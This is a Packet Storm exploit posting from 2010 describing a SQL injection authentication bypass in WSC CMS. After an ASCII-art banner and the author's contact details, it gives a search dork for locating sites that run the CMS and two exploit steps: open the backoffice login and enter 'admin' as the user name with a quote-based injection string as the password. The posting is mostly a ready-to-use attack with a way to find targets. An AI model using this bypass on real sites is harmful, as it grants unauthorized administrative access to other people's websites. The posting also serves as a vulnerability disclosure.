WSC CMS SQL Injection

2010-02-20T00:00:00
ID PACKETSTORM:86480
Type packetstorm
Reporter Phenom
Modified 2010-02-20T00:00:00

Description

                                        
                                            `# Exploit Title: WSC CMS (Bypass) SQL Injection Vulnerability  
# Date: 2010-02-19  
# Author: Phenom  
# Software Link:   
# Version:   
# Tested on: windows xp sp3  
# CVE :   
# Code :   
  
------------------------------------------------------  
------------------------------------------------------  
  
_____ _   
| __ \| |   
| |__) | |__ ___ _ __ ___ _ __ ___   
| ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \   
| | | | | | __/ | | | (_) | | | | | |   
|_| |_| |_|\___|_| |_|\/__/|_| |_| |_|   
  
  
------------------------------------------------------  
------------------------------------------------------  
  
############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################  
#  
# Author : Phenom  
#   
# mail : sys.phenom.sys[at]gmail[dot]com  
#  
# Dork : Realizzato con WSC CMS by Dynamicsoft   
#  
################################################################################################  
  
####### Exploit ################################################################################  
#  
# 1- http://server/public/backoffice   
#   
# 2- login with "admin" as user name and 'or' as password   
#  
################################################################################################  
`